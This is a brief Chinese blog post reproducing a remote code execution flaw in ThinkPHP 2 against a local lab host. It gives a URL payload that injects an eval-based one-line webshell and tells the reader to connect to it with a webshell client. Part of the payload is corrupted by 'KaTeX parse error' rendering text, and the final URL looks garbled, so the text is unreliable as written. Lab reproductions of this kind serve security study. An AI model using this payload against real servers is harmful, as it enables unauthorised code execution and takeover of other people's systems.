thinkphp 2 - rce漏洞复现

用渗透版火狐打开

http://192.168.127.131:8080/?s=/index/index/L/KaTeX parse error: Expected '}', got 'EOF' at end of input:{@print(eval(_POST[1]))}

打开页面成功说明存在漏洞

利用eval函数进行绕过

?s=/index/index/L/KaTeX parse error: Expected '}', got 'EOF' at end of input:{@print(eval(_POST[1]))}

使用一剑连接

http://192.168.127.131:8080/?s=/index/index/L/=/index/index/index/index/


本文来自互联网用户投稿,文章观点仅代表作者本人,不代表本站立场,不承担相关法律责任。如若转载,请注明出处。 如若内容造成侵权/违法违规/事实不符,请点击【内容举报】进行投诉反馈!

相关文章

立即
投稿

微信公众账号

微信扫一扫加关注

返回
顶部